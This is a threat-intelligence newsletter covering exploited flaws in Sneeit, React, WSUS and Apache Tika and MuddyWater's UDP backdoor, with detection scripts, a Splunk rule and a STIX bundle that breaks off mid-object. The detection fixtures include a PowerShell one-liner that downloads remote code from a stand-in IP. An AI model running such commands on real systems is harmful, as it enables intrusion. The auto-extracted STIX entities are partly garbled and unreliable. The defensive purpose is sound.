Attackers are actively exploiting a critical Remote Code Execution (RCE) flaw in the Sneeit Framework WordPress plugin (versions ≤ 8.3). This allows unauthenticated actors to take complete control of affected websites.
Business impact
Full compromise of web presence leads to immediate reputational damage, SEO poisoning, potential customer data theft, and regulatory fines under SOX/GDPR if PII is exposed.
Recommended action
Ask your Web/Marketing team: "Are we running the Sneeit Framework plugin, and if so, have we verified that it has been updated to version 8.4 or higher?"
Threat actors have significantly ramped up attacks targeting the React vulnerability CVE-2025-55182, known as "React2Shell." This flaw in the popular JavaScript library allows for remote command execution on servers hosting vulnerable applications.
Business impact
Successful exploitation allows attackers to bypass perimeter defenses and execute arbitrary code, leading to service disruption, data exfiltration, and potential lateral movement within the corporate network.
Recommended action
Ask your AppSec team: "Have we scanned our external-facing applications for CVE-2025-55182 and applied the necessary React patches?"
The ShadowPad malware campaign is now leveraging a Remote Code Execution vulnerability in Windows Server Update Services (WSUS). By compromising the update mechanism, attackers can distribute malware to all endpoints managed by the infected server.
Business impact
A compromised WSUS server acts as a trusted internal distribution point for malware, potentially infecting the entire server fleet simultaneously, causing catastrophic operational paralysis.
Recommended action
Ask your Infrastructure team: "Is our WSUS server patched against CVE-2025-59287, and are we monitoring for anomalous outbound connections from the update server?"
A critical vulnerability in Apache Tika allows attackers to perform XML External Entity (XXE) injection attacks using crafted XFA files embedded within PDFs. This affects systems that automatically process or index documents.
Business impact
Exploitation can lead to the theft of internal files, server-side request forgery (SSRF) against internal infrastructure, and denial of service, disrupting document management workflows.
Recommended action
Ask your Development team: "Do our applications use Apache Tika for document processing, and have we disabled external entity processing or updated to the fixed version?"
Hundreds of Porsche vehicles in Russia were rendered undrivable due to a malfunction in their factory-installed satellite security systems. This highlights the critical dependency on centralized IoT infrastructure for physical asset operation.
Business impact
For automotive and IoT-dependent businesses, this represents a direct revenue loss, massive customer dissatisfaction, and potential liability for bricked assets.
Recommended action
Ask your Product team: "Do our connected products have a fail-safe mode that allows basic operation if the central security server or satellite link fails?"
The US Treasury reports that ransomware payments have hit a historic high, with over $1.1 billion paid in 2023 alone across 1,512 incidents. This confirms ransomware remains a highly profitable and growing industry.
Business impact
Organizations must anticipate higher cyber insurance premiums and stricter coverage requirements. The financial risk of a breach now extends beyond recovery costs to massive extortion demands.
Recommended action
Ask your CISO: "Does our current cyber insurance policy cover ransom payments at these elevated market rates, and have we tested our ability to restore from backups without paying?"
The Iranian threat group MuddyWater is utilizing a new backdoor named "UDPGangster" that uses the UDP protocol for command-and-control, specifically targeting entities in Turkey, Israel, and Azerbaijan.
Business impact
Espionage and persistent access by state-sponsored actors can lead to intellectual property theft and long-term strategic compromise.
Recommended action
Ask your SOC: "Are we monitoring UDP traffic for anomalous patterns, specifically to known MuddyWater infrastructure or non-standard ports?"
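One concrete way to act on that SOC question is to look for periodic UDP traffic, since a C2 channel that polls its server on a timer shows up as near-constant gaps between flows. The following is an added example, not code from the newsletter or from any vendor it mentions: it groups constructed flow records by source, destination and port, flags groups whose inter-flow interval hardly varies, and ranks hits on ports the environment does not expect to carry UDP. The flow field names, the `EXPECTED_UDP_PORTS` allowlist and the jitter threshold are assumptions to be tuned locally.

```python
import statistics
from collections import defaultdict

# Assumption: the ports this network legitimately expects UDP on. Anything
# else that beacons on a regular timer deserves a look. Tune per environment.
EXPECTED_UDP_PORTS = {53, 67, 68, 123, 137, 138, 161, 443, 500, 514, 1194, 4500}

# Constructed flow records (not real telemetry): epoch seconds plus the parts
# of the 5-tuple the heuristic needs.
SAMPLE_FLOWS = [
    # Host talking to an external address on an unexpected port roughly every
    # 60 seconds with a little jitter: the beaconing shape we want to catch
    *[{"ts": t, "src": "10.0.0.12", "dst": "198.51.100.20", "dport": 21008, "proto": "udp"}
      for t in (1000, 1061, 1119, 1180, 1241, 1299, 1360, 1419)],
    # NTP: just as regular, but on an expected port to an internal server
    *[{"ts": t, "src": "10.0.0.12", "dst": "10.0.0.2", "dport": 123, "proto": "udp"}
      for t in (1000, 1064, 1128, 1192, 1256, 1320)],
    # DNS: too few flows to judge, and irregular anyway
    *[{"ts": t, "src": "10.0.0.12", "dst": "10.0.0.2", "dport": 53, "proto": "udp"}
      for t in (1003, 1005, 1040, 1200, 1201)],
    # Another host on the same odd port, but bursty rather than periodic
    *[{"ts": t, "src": "10.0.0.15", "dst": "203.0.113.9", "dport": 21008, "proto": "udp"}
      for t in (1000, 1005, 1300, 1302, 1303, 1900)],
    # TCP is ignored by this detector
    {"ts": 1010, "src": "10.0.0.12", "dst": "198.51.100.20", "dport": 443, "proto": "tcp"},
]


def find_udp_beacons(flows, min_flows=6, max_jitter=0.2):
    """Group UDP flows by (src, dst, dport) and flag groups whose gaps between
    consecutive flows are nearly constant (coefficient of variation <= max_jitter).
    Returns findings ordered with unexpected ports first, then by regularity."""
    groups = defaultdict(list)
    for f in flows:
        if f["proto"] == "udp":
            groups[(f["src"], f["dst"], f["dport"])].append(f["ts"])

    findings = []
    for (src, dst, dport), times in groups.items():
        if len(times) < min_flows:          # not enough samples to call it periodic
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            findings.append({
                "src": src, "dst": dst, "dport": dport, "flows": len(times),
                "mean_interval_s": round(mean, 1), "jitter": round(jitter, 3),
                "unexpected_port": dport not in EXPECTED_UDP_PORTS,
            })
    findings.sort(key=lambda f: (not f["unexpected_port"], f["jitter"]))
    return findings


if __name__ == "__main__":
    for finding in find_udp_beacons(SAMPLE_FLOWS):
        print(finding)
```

Regularity alone is not a verdict: the NTP group is flagged just as confidently as the unexpected-port group, which is why the allowlist decides the ranking and why a real deployment would also fold in destination reputation and byte counts before paging anyone.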
A former employee has launched a class-action lawsuit against The Washington Post following a data breach involving Oracle E-Business Suite (EBS) vulnerabilities that compromised 9,700 records.
Business impact
This illustrates the long-tail financial and legal liability of unpatched ERP systems, including class-action defense costs and settlements.
Recommended action
Ask your ERP team: "When was the last time we audited our Oracle EBS environment for known vulnerabilities, and is it segmented from the public internet?"
New versions of Android malware families FvncBot, SeedSnatcher, and ClayRat have been detected with enhanced data theft capabilities, masquerading as security updates or legitimate apps.
Business impact
Mobile malware compromises user credentials and 2FA tokens, bypassing authentication controls for corporate access and banking.
Recommended action
Ask your Mobile Device Management (MDM) team: "Do we enforce a policy that prevents the installation of apps from unknown sources on corporate-managed Android devices?"
CISA has issued new guidance for integrating Artificial Intelligence into Operational Technology (OT) environments, focusing on governance, behavioral analytics, and safety risks.
Business impact
Failure to adhere to these guidelines could result in regulatory scrutiny and increased safety risks as AI is adopted in industrial control systems.
Recommended action
Ask your OT Security lead: "Have we reviewed the new CISA guidance for our AI-driven industrial processes?"
Portugal has updated its cybercrime laws to provide exemptions for security researchers, potentially encouraging responsible disclosure but also changing the legal landscape for unauthorized testing.
With the Security Affairs newsletter highlighting a dual campaign targeting GlobalProtect VPNs and MuddyWater leveraging UDP backdoors, Palo Alto Networks provides critical visibility. Their App-ID technology can distinguish legitimate UDP traffic from the "UDPGangster" C2 channels, and their Threat Prevention signatures are essential for blocking the specific exploits targeting VPN gateways.
Actionable Platform Guidance: Ensure the "Strict" profile is applied to GlobalProtect interfaces. Enable App-ID for all UDP traffic to identify unknown applications tunneling over UDP. Review Threat Monitor for "GlobalProtect"-related alerts immediately.
index=security sourcetype="win:iis" OR sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
(process_name="w3wp.exe" OR process_name="wsus.exe")
(command_line="*cmd.exe*" OR command_line="*powershell*" OR command_line="*bitsadmin*")
| eval risk_score=case(
match(command_line, "(?i)download"), 100,
match(command_line, "(?i)invoke-expression"), 90,
1==1, 50)
| where risk_score >= 50
| table _time, src_ip, dest_ip, process_name, command_line, risk_score
| sort -_time
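To check what that Splunk search will actually surface before deploying it, the same filter and scoring logic is reproduced below in Python over constructed events. This is an added example, not part of the newsletter; the event field names follow the search (`process_name`, `command_line`, `src_ip`, `dest_ip`, `_time`) and the sample records are made up.

```python
import re

# Same filters as the SPL search
WATCHED_PROCESSES = {"w3wp.exe", "wsus.exe"}
SHELL_MARKERS = re.compile(r"cmd\.exe|powershell|bitsadmin", re.IGNORECASE)

# Constructed events (not real telemetry) in the field shape the search expects
SAMPLE_EVENTS = [
    {"_time": "2025-12-08T10:00:01Z", "src_ip": "203.0.113.7", "dest_ip": "10.0.0.5",
     "process_name": "w3wp.exe",
     "command_line": "powershell -nop -c (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"},
    {"_time": "2025-12-08T10:02:15Z", "src_ip": "203.0.113.7", "dest_ip": "10.0.0.5",
     "process_name": "w3wp.exe",
     "command_line": "powershell -nop -c \"Invoke-Expression $payload\""},
    {"_time": "2025-12-08T10:05:40Z", "src_ip": "10.0.0.9", "dest_ip": "10.0.0.5",
     "process_name": "w3wp.exe", "command_line": "cmd.exe /c whoami"},
    {"_time": "2025-12-08T10:06:00Z", "src_ip": "10.0.0.9", "dest_ip": "10.0.0.5",
     "process_name": "w3wp.exe",
     "command_line": "C:\\Windows\\System32\\conhost.exe 0x4"},      # no shell marker: dropped
    {"_time": "2025-12-08T10:07:30Z", "src_ip": "10.0.0.9", "dest_ip": "10.0.0.5",
     "process_name": "explorer.exe", "command_line": "cmd.exe /c dir"},  # unwatched process: dropped
]


def risk_score(command_line):
    """Mirror of the SPL case(): branches are tested in order, first hit wins,
    so a line containing both keywords scores 100, not 90."""
    if re.search(r"download", command_line, re.IGNORECASE):
        return 100
    if re.search(r"invoke-expression", command_line, re.IGNORECASE):
        return 90
    return 50


def score_events(events, threshold=50):
    """Apply the process and command-line filters, score, keep rows at or above
    the threshold and return them newest first (the `| sort -_time`)."""
    hits = []
    for ev in events:
        if ev.get("process_name", "").lower() not in WATCHED_PROCESSES:
            continue
        cmd = ev.get("command_line", "")
        if not SHELL_MARKERS.search(cmd):
            continue
        score = risk_score(cmd)
        if score >= threshold:
            hits.append({**ev, "risk_score": score})
    hits.sort(key=lambda h: h["_time"], reverse=True)
    return hits


if __name__ == "__main__":
    for hit in score_events(SAMPLE_EVENTS):
        print(hit["_time"], hit["process_name"], hit["risk_score"], hit["command_line"])
```

Two things the dry run makes visible. First, because the `case()` falls through to 50 and the `where` clause keeps everything at 50 or above, the threshold never removes a row; raising it to 90 is the knob that cuts noise. Second, in a Sysmon Event ID 1 record the web server process usually appears as the parent and the shell as the new process, so on Sysmon data the `process_name` filter may need to become a parent-process filter for the search to fire at all.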
4. PowerShell Script: Check Sneeit Plugin Version
$wpPath = "C:\inetpub\wwwroot\wp-content\plugins\sneeit-framework"
$computers = "localhost", "WEB01", "WEB02"
foreach ($computer in $computers) {
    if (Test-Connection -ComputerName $computer -Count 1 -Quiet) {
        Invoke-Command -ComputerName $computer -ScriptBlock {
            param($path)
            if (Test-Path $path) {
                # The plugin's main file carries a "Version: x.y" header line; read the number out of it
                $match = Get-Content "$path\sneeit-framework.php" -ErrorAction SilentlyContinue |
                    Select-String "Version:" | Select-Object -First 1
                $version = if ($match) { ($match.Line -replace '.*Version:\s*', '').Trim() } else { '' }
                # 8.4 is the first fixed release; anything older, or an unreadable header, is an alert
                if ($version -match '^\d+(\.\d+)+$' -and [version]$version -ge [version]'8.4') {
                    Write-Host "[OK] Sneeit Framework $version on ${env:COMPUTERNAME} is patched"
                } else {
                    Write-Host "[ALERT] Sneeit Framework found on ${env:COMPUTERNAME}: version '$version'"
                }
            } else {
                Write-Host "[OK] Sneeit Framework not found on ${env:COMPUTERNAME}"
            }
        } -ArgumentList $wpPath
    }
}
This rundown should provide a solid overview of the current threat landscape. Thank you to all our cyberheroes for your diligence and hard work. Stay vigilant!
About STIX 2.1: Structured Threat Information eXpression (STIX) is the machine language of cybersecurity. This bundle contains validated threat objects, indicators, and relationships that can be directly imported into your SIEM, TIP, or security orchestration platform.
Usage: Download or copy the JSON below and import it directly into your threat intelligence platform, SIEM, or security orchestration tools for automated threat detection and response.
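Before handing a bundle like the one below to a SIEM or TIP, it pays to walk it once yourself: resolve the `*_ref` links, confirm nothing dangles, and pull out the decisions the feed already encodes (which CVEs are in KEV, which techniques an actor is linked to). The following is an added example and not part of the feed or the platform that produced it. It embeds a constructed excerpt of the bundle using the page's own object ids, plus one deliberately broken relationship (placeholder ids) so the integrity check has something to report; the `x_` fields it reads are the custom properties the bundle uses.

```python
import json

# Constructed excerpt of the bundle: a few of its objects, verbatim ids, plus one
# made-up relationship whose target does not exist (all-zero placeholder ids).
SAMPLE_BUNDLE = json.loads(r'''
{
  "type": "bundle",
  "id": "bundle--06386f17-b9ea-40c0-9399-a7e91c426bae",
  "objects": [
    {"type": "marking-definition", "spec_version": "2.1",
     "id": "marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487",
     "definition_type": "tlp:2.0", "name": "TLP:CLEAR", "definition": {"tlp": "clear"}},
    {"type": "vulnerability", "spec_version": "2.1",
     "id": "vulnerability--09cfd756-732a-426d-8c11-8d9ddb3e9e05", "name": "CVE-2025-55182",
     "x_cvss_score": 10.0, "x_kev_status": true, "x_epss_score": 0.27191},
    {"type": "vulnerability", "spec_version": "2.1",
     "id": "vulnerability--2602bc7a-afdf-4d1b-b016-14b0b2cc89d1", "name": "CVE-2025-59287",
     "x_cvss_score": 9.8, "x_kev_status": true, "x_epss_score": 0.6231},
    {"type": "vulnerability", "spec_version": "2.1",
     "id": "vulnerability--df419c93-abc3-45d0-b742-594b93007e35", "name": "CVE-2025-6389",
     "x_cvss_score": 9.8, "x_kev_status": false, "x_epss_score": 0.00335},
    {"type": "threat-actor", "spec_version": "2.1",
     "id": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909", "name": "MuddyWater"},
    {"type": "attack-pattern", "spec_version": "2.1",
     "id": "attack-pattern--280ebd89-59bc-4ae2-a9db-1c01a56e50dc",
     "name": "Exploit Public-Facing Application", "x_mitre_id": "T1190"},
    {"type": "relationship", "spec_version": "2.1",
     "id": "relationship--e9f7f400-7343-4f4c-b1f7-1b243b366842", "relationship_type": "uses",
     "source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
     "target_ref": "attack-pattern--280ebd89-59bc-4ae2-a9db-1c01a56e50dc", "confidence": 60},
    {"type": "relationship", "spec_version": "2.1",
     "id": "relationship--00000000-0000-4000-8000-000000000000", "relationship_type": "uses",
     "source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
     "target_ref": "attack-pattern--00000000-0000-4000-8000-000000000001", "confidence": 60}
  ]
}
''')


def index_objects(bundle):
    """Map every object id to its object; all *_ref lookups go through this."""
    return {obj["id"]: obj for obj in bundle["objects"]}


def dangling_refs(bundle):
    """Relationships whose source or target is absent from the bundle. Most TIPs
    either reject these on import or drop the edge silently, so find them first."""
    ids = index_objects(bundle)
    problems = []
    for obj in bundle["objects"]:
        if obj["type"] != "relationship":
            continue
        for key in ("source_ref", "target_ref"):
            if obj[key] not in ids:
                problems.append((obj["id"], key, obj[key]))
    return problems


def prioritised_vulnerabilities(bundle):
    """CVE names in patching order: KEV-listed first, then CVSS, then EPSS."""
    vulns = [o for o in bundle["objects"] if o["type"] == "vulnerability"]
    vulns.sort(key=lambda v: (v.get("x_kev_status", False),
                              v.get("x_cvss_score", 0.0),
                              v.get("x_epss_score", 0.0)), reverse=True)
    return [v["name"] for v in vulns]


def techniques_for_actor(bundle, actor_name):
    """ATT&CK ids reachable from a named threat-actor via 'uses' relationships."""
    ids = index_objects(bundle)
    actors = {o["id"] for o in bundle["objects"]
              if o["type"] == "threat-actor" and o["name"] == actor_name}
    techniques = []
    for obj in bundle["objects"]:
        if obj["type"] == "relationship" and obj.get("relationship_type") == "uses" \
                and obj["source_ref"] in actors:
            target = ids.get(obj["target_ref"])
            if target and target["type"] == "attack-pattern":
                techniques.append(target.get("x_mitre_id", target["name"]))
    return sorted(techniques)


if __name__ == "__main__":
    print("patch order:", prioritised_vulnerabilities(SAMPLE_BUNDLE))
    print("MuddyWater techniques:", techniques_for_actor(SAMPLE_BUNDLE, "MuddyWater"))
    print("dangling refs:", dangling_refs(SAMPLE_BUNDLE))
```

Note that the relationships in this feed are tagged `mitre-cooccurrence` at confidence 60, meaning the actor and the technique were mentioned in the same article; treat `techniques_for_actor` output as a reading list for the analyst, not as attributed tradecraft, until a higher-confidence source confirms it.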
{
"type": "bundle",
"id": "bundle--06386f17-b9ea-40c0-9399-a7e91c426bae",
"objects": [
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487",
"created": "2022-10-01T00:00:00.000Z",
"definition_type": "tlp:2.0",
"name": "TLP:CLEAR",
"definition": {
"tlp": "clear"
}
},
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--d56430c9-6bf1-44b0-9b95-c1cbaf661923",
"created": "2025-12-08T13:54:59.239Z",
"modified": "2025-12-08T13:54:59.239Z",
"name": "MikeGPT Intelligence Platform",
"description": "AI-powered threat intelligence collection and analysis platform providing automated cybersecurity intelligence feeds",
"identity_class": "organization",
"sectors": [
"technology",
"defense"
],
"contact_information": "Website: https://mikegptai.com | Email: intel@mikegptai.com",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--9d3fc3b9-b6a4-4e77-87b1-c0ba1fb50cb7",
"created": "2025-12-08T13:54:59.239Z",
"modified": "2025-12-08T13:54:59.239Z",
"name": "Threat Intelligence Report - 2025-12-08",
"description": "Threat Intelligence Report - 2025-12-08\n\nThis report consolidates actionable cybersecurity intelligence from 58 sources, processed through automated threat analysis and relationship extraction.\n\nKEY FINDINGS:\n• Sneeit WordPress RCE Exploited in the Wild While ICTBroadcast Bug Fuels Frost Botnet Attacks (Score: 100)\n• Exploitation of React2Shell Surges (Score: 100)\n• U.S. CISA adds a Meta React Server Components flaw to its Known Exploited Vulnerabilities catalog (Score: 100)\n• Ex-Employee Sues Washington Post Over Oracle EBS-Related Data Breach (Score: 100)\n• SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 74 (Score: 100)\n\nEXTRACTED ENTITIES:\n• 14 Attack Pattern(s)\n• 1 Marking Definition(s)\n• 14 Relationship(s)\n• 1 Threat Actor(s)\n• 2 Tool(s)\n• 3 Vulnerability(s)\n\nCONFIDENCE ASSESSMENT:\nVariable confidence scoring applied based on entity type and intelligence source reliability. Confidence ranges from 30-95% reflecting professional intelligence assessment practices.\n\nGENERATION METADATA:\n- Processing Time: Automated\n- Validation: Three-LLM consensus committee\n- Standards Compliance: STIX 2.1\n",
"published": "2025-12-08T13:54:59.239Z",
"object_refs": [
"identity--d56430c9-6bf1-44b0-9b95-c1cbaf661923",
"vulnerability--09cfd756-732a-426d-8c11-8d9ddb3e9e05",
"identity--53a6e913-b371-4d86-baa7-f737222b3ce5",
"vulnerability--2602bc7a-afdf-4d1b-b016-14b0b2cc89d1",
"tool--3e383063-6bd8-4128-9ad6-93694ac0c723",
"vulnerability--df419c93-abc3-45d0-b742-594b93007e35",
"identity--8c780a2d-c2e1-4081-a002-eb0698c76ec2",
"tool--aa07bb34-c394-4745-a8fa-8fc216c808a9",
"identity--36805c2f-2e9f-4e29-9280-8a4aa9965a83",
"identity--cf27a276-b4e7-47de-b29f-71fd1a069c58",
"identity--eeecdab8-dfb0-43da-b416-a0f521113cba",
"threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"identity--f5741dce-fb19-40d5-9ed4-c314379276be",
"attack-pattern--280ebd89-59bc-4ae2-a9db-1c01a56e50dc",
"attack-pattern--e5974f70-5745-450a-908a-6483ad9c4678",
"attack-pattern--771ed4e5-6dde-43a8-9c72-d006b0c83e3d",
"attack-pattern--13fc9cbe-9444-4eba-872b-a44565ae3ab7",
"attack-pattern--ce39e6f2-b20f-421e-83e1-242a773e1927",
"attack-pattern--d5229cf6-f11b-41bc-8aca-0df713047400",
"attack-pattern--4a2578d4-fdf6-48d3-b66a-93c681e1e21e",
"attack-pattern--68a5c7b8-09b4-49b1-8149-bc23ed0260c9",
"attack-pattern--06cf8802-38e4-4421-a699-33a0bae74d96",
"attack-pattern--2e52cc86-c2ef-43d7-9f1e-2fc59c4845ee",
"attack-pattern--943edc6f-c0f9-48f1-b8d4-4666aa0abae1",
"attack-pattern--12a5aa0e-cd1f-4614-97d0-872085aa494b",
"attack-pattern--d2a77ce3-d278-4f77-97f0-227b744a33d3",
"attack-pattern--27b36b6d-ae90-4767-b07a-563ecef589ea",
"relationship--e9f7f400-7343-4f4c-b1f7-1b243b366842",
"relationship--46cd00ec-6ce0-4a79-a1ec-7fa01bc57d3e",
"relationship--655b3935-b3e7-47bd-bcf0-b2e168687c59",
"relationship--f7a31206-4513-420a-ad4c-686d6045b5ad",
"relationship--ea4f3740-3edf-4a49-b4ff-cec4313ccc87",
"relationship--45fe84ee-efbe-4421-bb01-e6d6641f64f8",
"relationship--d5e1003d-1187-486a-9a30-ab8e28d6248a",
"relationship--334da1c4-6e96-4dfb-a37f-984be7b542d9",
"relationship--33c60d98-4dad-4c7a-8872-61ab39baa8f3",
"relationship--eb4226af-9bb3-4855-931d-5d44d13c87bb",
"relationship--07b73f78-11ff-4e5e-8f6f-f1dec9870e28",
"relationship--8d8423e2-43b6-42fa-ac15-447aa227ccae",
"relationship--1e041532-9123-49fd-8932-0d4ac5538268",
"relationship--f41170b8-68af-413c-99d6-303751d2d9b1"
],
"labels": [
"threat-report",
"threat-intelligence"
],
"created_by_ref": "identity--d56430c9-6bf1-44b0-9b95-c1cbaf661923",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.235Z",
"modified": "2025-12-08T13:54:59.235Z",
"confidence": 95,
"type": "vulnerability",
"id": "vulnerability--09cfd756-732a-426d-8c11-8d9ddb3e9e05",
"name": "CVE-2025-55182",
"description": "A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints. CVSS Score: 10.0 (CRITICAL). CISA KEV: Active exploitation confirmed. EPSS: 27.2% exploitation probability",
"x_cvss_score": 10.0,
"x_cvss_severity": "CRITICAL",
"x_kev_status": true,
"x_epss_score": 0.27191,
"external_references": [
{
"source_name": "cve",
"external_id": "CVE-2025-55182",
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-55182"
},
{
"source_name": "nvd",
"external_id": "CVE-2025-55182",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55182"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"vulnerability"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "identity",
"id": "identity--53a6e913-b371-4d86-baa7-f737222b3ce5",
"name": "SecurityWeek",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "SecurityWeek is a cybersecurity news and information website that provides in-depth analysis and coverage of the latest threats, vulnerabilities, and industry trends.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "vulnerability",
"id": "vulnerability--2602bc7a-afdf-4d1b-b016-14b0b2cc89d1",
"name": "CVE-2025-59287",
"description": "Deserialization of untrusted data in Windows Server Update Service allows an unauthorized attacker to execute code over a network. CVSS Score: 9.8 (CRITICAL). CISA KEV: Active exploitation confirmed. EPSS: 62.3% exploitation probability",
"x_cvss_score": 9.8,
"x_cvss_severity": "CRITICAL",
"x_kev_status": true,
"x_epss_score": 0.6231,
"external_references": [
{
"source_name": "cve",
"external_id": "CVE-2025-59287",
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59287"
},
{
"source_name": "nvd",
"external_id": "CVE-2025-59287",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59287"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"vulnerability"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "tool",
"id": "tool--3e383063-6bd8-4128-9ad6-93694ac0c723",
"name": "Wordfence",
"tool_types": [
"unknown"
],
"labels": [
"tool"
],
"description": "Wordfence is a security plugin for WordPress that provides protection against malware, viruses, and other online threats through firewall rules, malware scanning, and login security features.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "vulnerability",
"id": "vulnerability--df419c93-abc3-45d0-b742-594b93007e35",
"name": "CVE-2025-6389",
"description": "The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 8.3 via the sneeit_articles_pagination_callback() function. This is due to the function accepting user input and then passing that through call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leveraged to inject backdoors or, for example, create new administrative user accounts. CVSS Score: 9.8 (CRITICAL). EPSS: 0.3% exploitation probability",
"x_cvss_score": 9.8,
"x_cvss_severity": "CRITICAL",
"x_kev_status": false,
"x_epss_score": 0.00335,
"external_references": [
{
"source_name": "cve",
"external_id": "CVE-2025-6389",
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6389"
},
{
"source_name": "nvd",
"external_id": "CVE-2025-6389",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6389"
}
],
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
],
"labels": [
"vulnerability"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.236Z",
"modified": "2025-12-08T13:54:59.236Z",
"confidence": 95,
"type": "identity",
"id": "identity--8c780a2d-c2e1-4081-a002-eb0698c76ec2",
"name": "Infrastructure Security Agency",
"identity_class": "organization",
"labels": [
"organization"
],
"description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is a federal agency responsible for protecting the United States' critical infrastructure from cybersecurity threats. It is a key player in the nation's cybersecurity efforts and provides various resources and guidelines for organizations to improve their cybersecurity posture.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "tool",
"id": "tool--aa07bb34-c394-4745-a8fa-8fc216c808a9",
"name": "GlobalProtect",
"tool_types": [
"unknown"
],
"labels": [
"tool"
],
"description": "GlobalProtect is a network security solution that provides secure remote access to a company's network by establishing a virtual private network (VPN) connection.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "identity",
"id": "identity--36805c2f-2e9f-4e29-9280-8a4aa9965a83",
"name": "CYFIRMA",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "CYFIRMA is a threat intelligence platform that provides real-time insights into an organization's attack surface and potential cyber threats.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "identity",
"id": "identity--cf27a276-b4e7-47de-b29f-71fd1a069c58",
"name": "Zimperium",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Zimperium is a mobile security company that provides on-device threat detection and protection for mobile devices.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "identity",
"id": "identity--eeecdab8-dfb0-43da-b416-a0f521113cba",
"name": "Critical Apache Tika Vulnerability Leads",
"identity_class": "organization",
"labels": [
"identity"
],
"description": "Critical Apache Tika Vulnerability Leads is a company.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "threat-actor",
"id": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"name": "MuddyWater",
"threat_actor_types": [
"hacker"
],
"labels": [
"threat-actor"
],
"description": "MuddyWater is an Iranian state-sponsored hacking group known for conducting cyber espionage and cyber attacks on various targets, including government and private sector organizations. They have been observed using various tactics, techniques, and procedures (TTPs) to compromise their targets, including the use of custom-made malware and tools.",
"object_marking_refs": [
"marking-definition--94868c89-83c2-464b-929b-a1a8aa3c8487"
]
},
{
"spec_version": "2.1",
"created": "2025-12-08T13:54:59.237Z",
"modified": "2025-12-08T13:54:59.237Z",
"confidence": 95,
"type": "identity",
"id": "identity--f5741dce-fb19-40d5-9ed4-c314379276be",
"name": "Tri-Century Eye Care",
"identity_class": "organization",
"labels": [
"organization"
],
